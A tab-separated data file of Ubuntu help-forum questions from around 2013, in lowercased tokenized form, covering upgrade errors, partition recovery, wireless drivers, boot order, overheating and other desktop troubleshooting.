370277	upgrading from 12.04 to 13.10 and having problems	i was unaware there was an up date was planning on asking about my up dating problems but i 'm kind of lazy that . way anyway i have red triangle with an exclamation mark in side of it and if i click on it tells me that the update information is outdated . this maybe caused by network problems or by a repository that is no longer available . please update manually by clicking on this icon and then selecting 'check for updates ' and check if some of the listed repositories fail . '' i do so and get this from the update manager w : failed to fetch cdrom : //ubuntu 12.04.3 lts _precise pangolin_ - release amd64 ( 20130820.1 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.04.3 lts _precise pangolin_ - release amd64 ( 20130820.1 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . i 'd like to fix this as well as update to the newer version of ubuntu .
370279	installing on ntfs partition	hello i currently have win xp installed on my pc , i got two drives c : ( main one ) and d : which i use as a backup drive and save all my videos & docs in . last time i installed ubuntu , it gave me an option to replace windows xp , i thought it will install on c : so i clicked yes , and it wiped all the data on whole drive . so i want to install ubuntu only on my c : as i cant backup my d : cuz it got over 100 gb of important data so external backup not possible ... last time i recovered that data using testdisk ( recovering 130 gb took lot of time.. ) so this possible or testdisk last resolution ?
370286	recover accidently deleted partition	i was using ubuntu 13.10 alongside w-7 . there was some broken packages on ubuntu so i decided to freshly install ubuntu . while installation i selected `` erase ubuntu 13.10 and reinstall '' . ubuntu reinstalled but my windows and whole partition got deleted annd entire disk is assigned to ubuntu only . there was some imp data in that partition partition and i want to recover that data . so guys , can i recover that data and how . please help its urgent
370287	how to install windows 7 alongside ubuntu	i know this is a bit twisted but i have ubuntu 12.04 installed alongside windows 8 . but now my windows 8 has stopped working . i do n't wan na fix it , i just wan na install windows 7 without loosing ubuntu . can it be done ? how ? i 'm a newbie at this so please provide a detailed procedure . thanks in advance !
370288	nothing is downloading on ubuntu ?	i have been using ubuntu for the past two days , on a laptop assigned by the university . nothing is downloading on ubuntu , here , i ca n't access youtube because there is no pre installed flash player , i do n't know what to do , please help . whenever i try downloading anything from the software center , it just says `` check internet connection '' or this other message , something about restriction , im sorry , dont remember that one specifically . also , other people have downloaded torrent and everything on their ubuntus , same university laptops , and they work just fine
370291	getting wlan on my laptop to work ( medion md98300 )	dear ubuntu community , i am having difficulties to get the wlan adapter on my medion 98300 laptop to work . the wlan card seems to be connected through an internal usb interface and the card itself had shown up as a wirelles network while installing ubuntu . i have tried a few things earlier , but none of my google reasearches have brought me to a working solution ... i am quite new to the linux system and only knoew a couple of terminal commands so far , so i probably have missed out on a few possible solutions . maybe you can help me ? thank you very much in advance ! a few minimal technical details : amd turion 64 x2 dual-core mobile technolgie tl-50 nvidia geforce go 6150 sandisk 64gb ssd 2gb ram ddr2 667 nforce chipset ( i forgot the version , but deductable from the gpu i guess ) wifi : zydas zd1211b 802.11g thank 's a lot again ! : ) update : i tried around myself a little and found a guide on the linux mint forums that helped ! i already had tried to install the linux backport modules etc . what i finally did was update the linux firmware and run the following command : echo `` options acer_wmi wirelles=1 '' sudo tee /etc/modprobe.d/acer_wmi.conf and rebooted now i found and could connect to networks , but unfortunately i found , that the link quality was very bad , around 40 to 50 . eventhough my router is running at high power and is only 6 meters away ! i then switched a few channels , but that did not improve much . before , under windows , i had a very good link quality and had the entire 16mbit/s internet connection at disposition , now i can only get about 3-5mbit/s . better then nothing , but still pretty bad ! the `` tx power '' is fixed on 20dbm and iwconfig says , that the `` power management '' is off ... maybe the power of the module is set too low ? ... update2 : i figured that 20dbm is a normal power output . i even tried to change the power using iwconfig wlan0 txpower integerhere but , obviously my `` card '' does not support more then 20 . more would probably be illegal as well , so i wo n't even use more then 20 . i guess that i will have to figure out a way , or maybe just switch cards . are the mailboard-usb-connectors on a laptop of the same property as the standard external ones ? if so , i could simply solder a micro wirelless n adapter onto the board : ) update3 : some further fiddling around seems to have improved it a bit , so that i got 14mbit/s at some point , but it 's still pretty unstable ! hm ...
370292	using internal speakers for skype calls with headset plugged in	is there any way i could make sound come through my system 's internal speakers instead of headphones , with headphones inserted as i have to speak through them .
370293	upgrade to 13.10 from 13.04 wol no longer works !	please help . after upgrading from 13.04 to 13.10 , wol no longer works . running ethtool shows that my atheros alx ethernet card no longer says it supports wol ? ? ? i researched and found that the linux kernel guys removed wol support on the alx driver ? is there a way to undo that ? http : //comments.gmane.org/gmane.linux.network/275477 help ! ?
370296	mantis is installed but unable to locate it for configuration	i tried installing mantisbt bug tracker with the following command : sudo apt-get install mantis and got the following output reading package lists ... done building dependency tree reading state information ... done mantis is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 36 not upgraded . however , i am unable to figure out how to configure it further , or even where it is located . i tried doing the following . $ mantis mantis : command not found $ which mantis $ i am new to ubuntu installation . what should i try next to get this package running ?
370297	wubi.exe is not installed . i am using windows 7 pc . what do you think is the problem ?	it shows `` failed to run pyrun '' , that an internal error occured . what do you think is the problem and how can i fix it ?
370298	would my downloaded ubuntu , require an internet conncetion ?	so i download a setup of ubuntu 12.04 lts of about 600 mb ( do n't remember the actual size ) and burned it on a usb using unetbootin . so , is that ubuntu , the offline installer ? as i cant run online installer as i have a broadband with a speed of 256 kbps .
370304	xf86 keybinds in openbox	lubuntu uses openbox as its window manager . ~/.config/openbox/lubuntu-rc.xml is a file that specifies , among other things , keybinds for various commands . most of the keybinds in lubuntu-rc.xml use modifier keys such as control , shift , alt , and super . for example , one way of opening a terminal window would be by pressing control+alt+t together : < ! -- launch a terminal on ctrl + alt + t -- > < keybind key= '' c-a-t '' > < action name= '' execute '' > < command > lxsession-default terminal < /command > < /action > < /keybind > but there is also this : < ! -- keybinding for terminal button -- > < keybind key= '' xf86www '' > < action name= '' execute '' > < command > lxsession-default terminal < /command > < /action > < /keybind > < keybind key= '' xf86terminal '' > < action name= '' execute '' > < command > lxsession-default terminal < /command > < /action > < /keybind > what are keybind key= '' xf86www '' and keybind key= '' xf86terminal '' ? how do i locate these keys on my laptop 's keyboard ? my laptop is a dell inspiron n 1545 from 2008 .
370305	problem with installing vbox guest additions in 13.10 ( shared folders )	i am using 13.10 for both the host and guest . the host has the guest additions iso . while installing the guest additions , i encounter an error when trying to compile the shared files module . the relevant log file /var/log/vboxadd-install.log shows the following : gcc -wp , -md , /tmp/vbox.0/.dirops.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/4.8/include -i/usr/src/linux-he aders-3.11.0-12-generic/arch/x86/include -iarch/x86/include/generated -iinclude -i/usr/src/linux-headers-3.11.0-12-gene ric/arch/x86/include/uapi -iarch/x86/include/generated/uapi -i/usr/src/linux-headers-3.11.0-12-generic/include/uapi -iin clude/generated/uapi -include /usr/src/linux-headers-3.11.0-12-generic/include/linux/kconfig.h -iubuntu/include -d__ker nel__ -wall -wundef -wstrict-prototypes -wno-trigraphs -fno-strict-aliasing -fno-common -werror-implicit-function-declar ation -wno-format-security -fno-delete-null-pointer-checks -o2 -m64 -mno-sse -mpreferred-stack-boundary=3 -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -maccumulate-outgoing-args -fstack-protector -dconfig_x86_x32_abi -dconf ig_as_cfi=1 -dconfig_as_cfi_signal_frame=1 -dconfig_as_cfi_sections=1 -dconfig_as_fxsaveq=1 -dconfig_as_avx=1 -dconfig_a s_avx2=1 -pipe -wno-sign-compare -fno-asynchronous-unwind-tables -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -wframe -larger-than=1024 -wno-unused-but-set-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -pg -mfentry -dcc_usi ng_fentry -wdeclaration-after-statement -wno-pointer-sign -fno-strict-overflow -fconserve-stack -dcc_have_asm_goto -fsho rt-wchar -include /tmp/vbox.0/include/vbox/vboxguestmangling.h -i/lib/modules/3.11.0-12-generic/build/include -i/tmp/vbo x.0/ -i/tmp/vbox.0/include -i/tmp/vbox.0/r0drv/linux -i/tmp/vbox.0/vboxsf/ -i/tmp/vbox.0/vboxsf/include -i/tmp/vbox.0/vb oxsf/r0drv/linux -d__kernel__ -dmodule -drt_os_linux -din_ring0 -din_rt_r0 -din_sup_r0 -dvbox -dvbox_with_hgcm -din_modu le -din_guest_r0 -drt_no_export_symbol -drt_arch_amd64 -dvbox_with_64_bits_guests -dmodule -d '' kbuild_str ( s ) = # s '' -d '' kbu ild_basename=kbuild_str ( dirops ) '' -d '' kbuild_modname=kbuild_str ( vboxsf ) '' -c -o /tmp/vbox.0/.tmp_dirops.o /tmp/vbox.0/diro ps.c /tmp/vbox.0/dirops.c:292:5 : error : unknown field ‘readdir’ specified in initializer .readdir = sf_dir_read , ^ i believe this may be relevant to https : //forums.virtualbox.org/viewtopic.php ? f=10 & t=56954 . has anyone else encountered the same issue and is there a simple fix around it ?
370306	libxss.so is missing when i run google chrome	i installed google chrome ( 32-bit ) and got an error when i run google-chrome on ubuntu 12.04 32-bit . it shows me that `` error while loading shared libraries : libxss.so.1 : can not open shared object file : no such file or directory '' i need help .
370307	what command for showing disk usage of specific directory non recursive ?	can i show how much disk space a directory 's contents are using , not including its sub directories ( and their contents ) ? if so , what commands ( s ) please ? thanks .
370308	loading up ubuntu from a usb	when i try to boot ubuntu when it gives me a choice between windows 8 and ubuntu , it comes up with a screen that tells me to put in the windows installation disc . i started to use a usb . i downloaded ubuntu i3 onto the usb through pendrivelinux . i have read that i need to switch my boot order so that the usb will boot instead of my hard drive . i ca n't find that . i 've been told that the screen should say : odd hdd usb lan i do n't have a screen that resembles that . in my bios i have a screen that shows a boot order as : uefi boot order os boot manager internal cd/dvd rom drive usb cd/dvd rom drive usb diskette on key/usb hard drive ! network adapter i 've read in places mentioning enabling legacy support . but i do n't want to do anything without some guidance here . if anyone can help me in some way here , i would really appreciate it . i am a beginner when it comes to this aspect of computers .
370316	mismatch of version of libkdcraw20 and libkdcraw-data	i 'm using ubuntu 12.04 lts . when i 'm installlin digikam , i 'm getting a mismatch in the versions of libkdcraw20 and libkdcraw-data wanted by it and that available in the repositories . it wants version 4.8.5-0ubuntu0.2 ( or in other words that is the latest version according to synaptic ) but the available one is 4.8.5-0ubuntu0.3 in both cases . addenda : on synaptic i selected digikam to be installed . it downloaded all the dependencies but the 2 in question were not found - the message it gave '' w : failed to fetch security.ubuntu.com/ubuntu/pool/main/libk/libkdcraw/âś 404 not found [ ip : 91.189.91.13 80 ] '' . i google-searched the 2 files in the repositories to find that the version available there is ubuntu0.3 instead of ubuntu0.2 . is there a work-around ? or how do i request the ubuntu managers to rectify this ?
370320	remove ubuntu from duel boot	i have two instances of ubuntu installed in my machine . they are installed in separate partition respectively , so it is a dual boot . i want to remove one of the instance of the ubuntu . can i just format the partition ? or what is the safe way to do it ?
370322	unknown chipset and kvm : disabled by bios	i have ubuntu and windows 7 installed . whenever i boot ubuntu , i see a message during booting : [ 9.035335 ] nouveau e [ device ] [ 0000:01:00.0 ] unknown chipset , 0x108120a1 [ 9.035377 ] nouveau e [ drm ] failed to create 0x80000080 , -22 [ 9.035388 ] kvm : disabled by bios [ 9.037022 ] kvm : disabled by bios [ 9.038022 ] kvm : disabled by bios [ 9.042021 ] kvm : disabled by bios what does this mean and what do i do about it ?
370324	how to mount remote pen drive on my system using terminal	i have computer a and computer b. i have attached a pendrive /dev/sda5 on computer b and i want to mount it on computer a through terminal . i do n't want to use the gui to connet to the server and then mount it . i want to mount through terminal . like : mount root @ x.x.x.x : /dev/sda5 /home/xyz/desktop or something like this .
370325	switch sound to hdmi in lubuntu without installing additional packages	lubuntu does n't use pulse audio , only alsa . the only tools that come with it are alsamixer , alsactl , and aplay . i have already managed to output sound from my tv using this command : aplay -d plughw:0,3 /usr/share/sounds/alsa/front_center.wav how can i switch to hdmi without installing pulseaudio , or anything else , using only the tools that are already available out of the box ?
370327	is there tablet apps on ubuntu	hi is there any software for ubuntu ( i have 13.04 64bit ) that you can install tablet apps on and test and write your own apps for tablets and phones ?
370328	how to completely remove ubuntu and put windows back ?	i do n't need ubuntu now . it is listed as my default os . i mean the grub was the ubuntu one . i have windows 7 in my laptop . i would like to retain it . how to do it ? it does n't recognise back up cd . is it possible to see my laptop as it was , just with windows when i purchased it ? my ubuntu is 13.10 version .
370331	ubuntu 12.04 - netw adapter not working , only able to see tty1 screen . not able to connect to internet - deleted files by mistake !	my auto complete was not working and when ever i press tab i was getting a message something related to dnec something . so i did rm dnec* and it started deleting files . it asked for my confirmation like - type `` yes , remove all files ! '' and i thought it would rectify the auto complete but it started to delete the system files ! i did ctrl+z and the next time i restarted my gui is gone and network softwares were deleted . i 'm only able to get into the tty1 screen and i 'm not sure what all files have been deleted ! ! is it possible to go back to last good known config without losing any data ? im pasting the xorg.0.log and xorg.0.old.log files . pls help ! ! ! ! http : //paste.ubuntu.com/6351376
370335	evolution 3.8.4 and oauth fault message	i have following fault message in evolution by sending ( replying on ) mails : data source 'xxxxx @ googlemail.com ' does not support oauth 2.0 authentication what i did wrong ?
370338	how do i add convert wav into flac to the context menu ?	i would like to right click on an wav-audio file in nautilus or dolphin and convert it to a flac-audio file that way with the highest possible loss less compression .
370339	why doesnt the os play music files or videos from the usb stick ?	okay i know this must seem like a dumb question but i downloaded and ran the os from a 16 gb usb stick/flashdrive and i love it , but i could not watch videos or listen to music files ! and i love those . am i doing something wrong ? i was wondering if it has to do with my running it off this usb thing ? also i ca n't seem to use that software thing to add anything ? i guess i am wondering why not and if it is because it is running off a flash drive ?
370340	ubuntu 13.10 bluetooth is not working	blue-tooth is not working it is giving error like gdbus erro ... one solution to this i found is to install blueman from app centre , but then iâve two blue-tooth icons on indicator , i tried to remove the default blue-tooth but i ca n't , after removing is still shows up there .
370343	double click a file to run a specific command	i 'd like to new a file obtaining a cmd such as `` sudo gedit filename '' . when i double click this file , the cmd in this file is executed . how to make it work ? thanks and the os is ubuntu 13.10
370344	is there a mouse trail option ?	i have intermittent blindness in my right eye . windows had a great mouse option that made a trail of cursors behind the one that 's functional . it made my mouse easier to see . the control button helps me find my mouse , but i need something to help me track it as it moves . any help appreciated . thanks in advance ! ps : i prefer bash shell installs , copy paste easier then having to read small download link on websites .
370347	unable to uninstall maas completely	i 'm not able to uninstall maas sudo apt-get purge maas ; sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done package 'maas ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up maas-region-controller ( 1.2+bzr1373+dfsg-0ubuntu1 ) ... considering dependency proxy for proxy_http : module proxy already enabled module proxy_http already enabled module expires already enabled module wsgi already enabled sed : -e expression # 1 , char 91 : unterminated `s ' command dpkg : error processing maas-region-controller ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of maas-dns : maas-dns depends on maas-region-controller ( = 1.2+bzr1373+dfsg-0ubuntu1 ) ; however : package maas-region-controller is not configured yet . dpkg : error processing maas-dns ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : maas-region-controller maas-dns e : sub-process /usr/bin/dpkg returned an error code ( 1 ) reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up maas-region-controller ( 1.2+bzr1373+dfsg-0ubuntu1 ) ... considering dependency proxy for proxy_http : module proxy already enabled module proxy_http already enabled module expires already enabled module wsgi already enabled sed : -e expression # 1 , char 91 : unterminated `s ' command dpkg : error processing maas-region-controller ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of maas-dns : maas-dns depends on maas-region-controller ( = 1.2+bzr1373+dfsg-0ubuntu1 ) ; however : package maas-region-controller is not configured yet . dpkg : error processing maas-dns ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : maas-region-controller maas-dns e : sub-process /usr/bin/dpkg returned an error code ( 1 )
370348	missing ui components	i just installed 32 bit ubuntu 13.10 on my old dell computer . after setting everything up ( besides internet ) and logging in , my important ui components are missing ! that includes my status bar at the top ( dash ? ) and the launcher . i installed this iso directly from the website . if there is a fix or alternative for this , it would be awesome for you to share it ! thanks , noah .
370350	what do i do when it says disk failed to mount no mountable file systems	i am trying to dual boot 12.04 with mac os x on my powerbook g4 and i am stuck with that message can some one please help
370352	wine error with no words	just installed lubuntu 13.04 on my toshiba satelite ( 1/2 gb ram ) and installed playonlinux ( wine 1.4 front-end ) from the lubuntu software center . i can understand if some programs do n't run . but the error messages do n't have anything written on it . just the title `` program error '' . by the way , i was running a ragnarok private server . i even tried to run notepad and same thing . i doubt we can fix ragnarok not running , but what 's wrong with the error message ? =================== i was installing other programs along with wine ( eclipse , gimp , zsnes , audacity , vlc , pencil ) . may have had something to do with a pop-up i got mentioning fonts . pressed enter but it said i did n't agree to some `` terms and conditions '' thing i did n't see . i 've tried uninstalling and reinstalling , but the pop up did n't reappear . =================== update : i 've found the missing fonts thing . how can i accept microsoft eula agreement for ttf-mscorefonts-installer ? however , wine still ca n't run properly . the error message is still empty .
370356	difference between `grep '\ < hi\ > ' coco.txt` and `grep 'hi ' coco.txt`	what is the difference between : grep '\ < hi\ > ' coco.txt , and grep 'hi ' coco.txt ? i applied these commands in terminal , but i do not see any difference .
370357	can a folder and its files/subfolders have different permissions ?	i want a certain folder to be owned by root , without affecting its files/subfolders . those files should be accessible to everyone ( but since the folder is owned by root , one can copy those files to anywhere else only through an instance of gksudo nautilus ) is that possible ?
370362	home directory running out of space	my hard disk size is 750 gb out of which only 93 gb is only assigned to home directory and root directory has 600 gb . the home directory space 99 % is in use . i 've installed gparted but when i right click in home directory resize/move option is not hightlighted . how can i reduce the size of root directory and add space to home directory ?
370364	how to make ubuntu as the second operating system	so , i installed debian ( my dad installed it , i dont know , i am just 13 ) , 2 months ago and after that installed ubuntu ( i installed it ! ! ! ) alongside debian by re-sizing the partition . now , the ubuntu is in the first option and the second one is debian . ( i regularly use debian ) . i want debian to be the first one choice
370368	after installing coffee script the coffee command is found but does nothing	i just installed coffe script with npm ( sudo npm install -g coffee-script ) when i type coffee into my terminal nothing happens . the command is found but does not show any reaction . does anyone know how to fix that or could have gone wrong ?
370369	reading mail from system user	when i log into a server , i get you have mail . with alpine and sudo alpine i 've deleted all my and root 's emails , but there is also a file /var/spool/mail/smmsp . how can i check email from that user ?
370370	atheros ar9285 / lenovo g560 wireless not working after installing 13.04	i had ubuntu 12.04 initially installed on my laptop . i upgraded to 12.10 then 13.04 . everything worked fine , including wireless . after adding a new memory card ( i only had 2 gb and one memory slot free ) my wireess stopped working . i backed up all my data and reinstallled ubuntu 13.04 . everything works fine except wireess . i bought this laptop in 2010 from japan . it has intel core i5 cpu m 450 @ 2.40 ghz * 4 3,7 gb ram os type 64 bit the output of iwconfig : eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off the output of rfkill list all : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no the output of lshw -c network : *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : wlan0 version : 01 serial : 78 : e4:00:7d : fe : fa width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.8.0-19-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : d6400000-d640ffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : 02 serial : 88 : ae:1d:2b:36 : ac size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.2.2 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : d2410000-d2410fff memory : d2400000-d240ffff memory : d2420000-d243ffff the wi-fi network appears as disconnected ( it 's greyed out ) strangely enough i see a wifi network ( not mine ) but not mine or the rest . that network does n't require a password . i click on it , try to connect and i get an error message : failed to connect to xxxxx ... 32 ) the access point/org/freedesktop/networkmanager/accesspoint/0 was not in the scan list . someone help please
370371	sudo dhclient eth0 | sudo : unable to resolve host ubuntu | maybe dns issue	i have a computer of a friend of mine , that runs ubuntu ( i do n't know what version , due to the current system status ) and while he was updating the kernel , he reboot the computer ( yes that could be happen ! ! , anyway ) currently i am trying to recover the system by using a live usb , with ubuntu installed on it . what i am doing , is the following : update failure the problem is that when i try to execute the fifth step , i am getting error because i do not have internet access . the computer is properly wired on my rooter , and i have internet access in any place apart of the shell . this message for example is send it via the live usb . but i can not access the internet via the shell . in my shell i try to use this command : sudo dhclient eth0 but the result of this command is the following message sudo : unable to resolve host ubuntu my hosts file has the following content : 127.0.0.1 localhost 127.0.1.1 ubuntu # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters ff02 : :3 ip6-allhosts how can i get connected on the internet , in order to download the appropriate updates ? update 1 i just notice , that when i execute the ifconfig i am getting the following warning : warning : can not open /proc/net/dev ( no such file or directory ) . limited output . update 2 i just found that , and looks like solving the problem with dhclient eth0 command , but still i can not ping google update 3 now the sudo dhclient eth0 returns the following message : rtnetlink answers : file exists update 4 i just ping my rooter and i getting response , so , it is looks like i can not ping outside the rooter ( ie . google ) update 5 i just run ping 8.8.8.8 and still i am getting result . this means i am able to contact google public dns , but not the google itself . i just run route -n and i am getting the following result : root @ ubuntu : / # route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 update 7 also i notice that the file /etc/resolv.conf it is empty : ? solution the solution is the following : sudo dpkg-reconfigure resolvconf kind regards ...
370376	configuring ubuntu 12.04 so that it recognizes the recently installed icc compiler	i have an ubuntu 12.04 . i installed the icc compiler ( composer_xe_2013_sp1.0.080 ) but when i try to compile using it i get the message : icc : command not found . i 've read somewhere that when you install a new software you have to make something so that the os gets aware of it , like modifying the bashrc file or something , but how to do it ?
370382	how can i open sisx package ?	i recently downloaded a dictionary and a movie both in a compressed format carrying the name ( sisx ) , but my ubuntu 13.10 could not open it , i searched the software center but it did not hep .
370383	dash all over my unity in asus k45vd	i installed ubuntu 13.10 in asus k45vd laptop . sometimes when i 'm working with my laptop i see dashes all over my screen ( showing them takes maybe less than one secconds so it 's difficult to take screenshot . ) this problem just is in unity in other desktops which i installed like xfce4 , kde , gnome-shell there is n't this problem . in ubuntu 13.04 there was this problem in my laptop too , and i tested ubuntu in another laptop asus k55vd there is this problem in that laptop too . i thought this a unity bug in asus kxxvd series ! is there any solution for this problem ?
370389	folder permissions	i installed like-wise-open to join users to my windows domain , the problem is that users can access all like-wise-open folders which mean that they can see some personal users folders and information , how can i restrict the permissions to be folder owner only ? how can i block this option ? thanks .
370391	amd designation in iso file , and installing on internal ssd	two very basic questions re 12.04.3-desktop-amd64 i am concerned about the `` amd '' designation . does this mean it is for use with amd processors only ? my desktop is a lenovo 450k with an intel i5 processor and an nvidia gpu . my oem spindle hard drive has win8.1 on it ; i want to install ubuntu on a second internal hard drive which is a samsung 830 solid state hard drive . are there any instruction on how to do this so that i have an option of booting into 8.1 or 12.04 ? any pitfalls to be wary of ?
370392	i ca n't upgrade from 12.10 to 13.04	i got alot of errors while upgrading and the upgrading stopped . i ca n't open the update manager anymore . tonkku @ ubuntu : ~ $ update-manager -d ( update-manager:12524 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:62:17 : theming engine 'unico ' not found traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 37 , in < module > from updatemanager.updatemanager import updatemanager file `` /usr/lib/python3/dist-packages/updatemanager/updatemanager.py '' , line 39 , in < module > import dbus file `` /usr/lib/python3/dist-packages/dbus/__init__.py '' , line 82 , in < module > import dbus.types as types file `` /usr/lib/python3/dist-packages/dbus/types.py '' , line 6 , in < module > from _dbus_bindings import ( importerror : no module named _dbus_bindings by the way , i used wubi to install ubuntu . is that affecting it ?
370397	installation stuck at `` detecting file systems '' on macbook pro 8,1	macbook pro 8,1 ; ubuntu 13.10 last line : something like ubuntu-bluetoothd : operation not permitted
370398	how to get a drive formatted with exfat working ?	in ubuntu 13.04 there was an option to use the ppa by relan in order to get exfat functionality . seeing that in ubuntu this functionality is now available from the repositories without the ppa i tried this but failed to make it work . so my question is how do i enable exfat support ? old way sudo apt-add-repository ppa : relan/exfat sudo apt-get update sudo apt-get install exfat-fuse exfat-utils tried now via ubuntu software center sudo apt-get install exfat-utils exfat-fuse
370401	fan is working on ac power without stop while graphic card is on power-saving mode and laptop-mode is running	i 've installed fglrx and laptop-mode on my 13.10 . my graphic card is a hybrid and the power-saving graphic card is activated but the fan never stops on ac power . actually when i remove the ac power it stops but it is n't like what is was when i had jupiter on my old 13.04 . now i just care about the fan and i do n't wa n't the whole system to go on power-saving mode ( i need the system permanence ) but i get tired of the fan sound : ( how can i decrease the fan working time without putting the system in power-saving mode and removing the ac power ? note : i do n't care about the graphics i just need the cpu , ram and hdd to work with a good performance .
370407	same wallpaper for all users	i joined some users from my domain to ubuntu through like-wise-open , and i want all of them to get the same wallpaper from the net , how can i do it ? maybe by login script ? i even thought about doing it local but i did n't knew how to make it for all of the users ( that are using the same computer . ) this is the first week for me with ubuntu so please explain your idea 's . thanks ! : )
370410	how to get the scanner working on hp cm1312 mfp and ubuntu 13.10	i searched the askubuntu and got to two questions about the same issue , which i could not answer because i do n't have enough karma : ( . so i am posting the solution here . after clean install , and installing the printer hplip , also install hplip toolbox from the software centre . now , if you use 'simple scan ' from the dash to scan a document , the hptoolbox will prompt you to install the required plugin . you can also install the plugin directly from the hptoolbox on the actions tab . after this , my scanner works perfectly . ( scan via network to pc ) .
370415	cpu overheating . what can i do ?	i 've experienced a few emergency shutdowns due to overheating . ( always while playing minecraft ) i checked what sensors would say me and i got this reply : coretemp-isa-0000 adapter : isa adapter physical id 0 : +52.0°c ( high = +80.0°c , crit = +85.0°c ) core 0 : +52.0°c ( high = +80.0°c , crit = +85.0°c ) core 1 : +48.0°c ( high = +80.0°c , crit = +85.0°c ) this means i have to keep my cpu temp below 85°c . how can i achieve this ? i 've tried to use lxde for gaming , which reduced the nuber of overheatings , but they still are there . i 've read through the /var/log/kern.log.1 and found these lines at the crash time : nov 3 12:12:27 dracarys kernel : [ 1466.805429 ] cpu1 : core temperature above threshold , cpu clock throttled ( total events = 1 ) nov 3 12:12:27 dracarys kernel : [ 1466.805432 ] cpu0 : package temperature above threshold , cpu clock throttled ( total events = 1 ) nov 3 12:12:27 dracarys kernel : [ 1466.805438 ] cpu1 : package temperature above threshold , cpu clock throttled ( total events = 1 ) nov 3 12:12:27 dracarys kernel : [ 1466.806434 ] cpu1 : core temperature/speed normal nov 3 12:12:27 dracarys kernel : [ 1466.806436 ] cpu0 : package temperature/speed normal nov 3 12:12:27 dracarys kernel : [ 1466.806440 ] cpu1 : package temperature/speed normal nov 3 12:13:00 dracarys kernel : [ 1499.816082 ] mce : [ hardware error ] : machine check events logged nov 3 12:13:44 dracarys kernel : imklog 5.8.11 , log source = /proc/kmsg started . nov 3 12:13:44 dracarys kernel : [ 0.000000 ] initializing cgroup subsys cpuset nov 3 12:13:44 dracarys kernel : [ 0.000000 ] initializing cgroup subsys cpu nov 3 12:13:44 dracarys kernel : [ 0.000000 ] linux version 3.8.0-32-generic ( buildd @ lamiak ) ( gcc version 4.7.3 ( ubuntu/linaro 4.7.3-1ubuntu1 ) ) # 47-ubuntu smp tue oct 1 22:35:23 utc 2013 ( ubuntu 3.8.0-32.47-generic 3.8.13.10 ) nov 3 12:13:44 dracarys kernel : [ 0.000000 ] command line : boot_image=/boot/vmlinuz-3.8.0-32-generic root=uuid=217614be-d869-4303-8ca9-92fb8680dde6 ro quiet splash vt.handoff=7 it says the temperature could be brought down again , but the computer yet switched off .
370418	ca n't upgrade from 13.04 to 13.10	when i open the software updater the option to upgrade to 13.10 does n't appear , what should i do ?
370425	key combinations : less sensitive ?	there seems to be some change in 13.10 that makes recognizing key-combinations less sensitive . does anyone know of where such a thing is configured ? here 's the story , just until a few days ago , using 13.04 , i have had no problem opening terminals ( i 'm a programmer , so that happens a lot ) using ctrl+alt+t . the lightest press on the three keys ( and quite fast ) would get me a terminal . ever since 13.10 , it does n't work the same way . now i have to press the keys for a longer time for it to do something . it 's quite annoying since i often open a terminal , write a command and close it and half of the times the terminal does n't even open . some other observations that i made : trying with ctrl+shift+n ( to open a new terminal ) , ubuntu is quite snappy . again , lightest press immediately gives a new terminal . running ubuntu 12.04 in virtualbox ( inside the same ubuntu 13.10 ) does n't have this issue . the virtual ubuntu is snappy as always . from the second observation , i can surely tell that it 's not a keyboard issue . if it was , my 12.04 would also have problems . the first observation is confusing though . any thoughts or settings i could look at ?
370427	can not find skype in software center	i just upgraded mu linux version on new ubuntu 13.10 . when i was looking for skype in software centre , i did not find it .
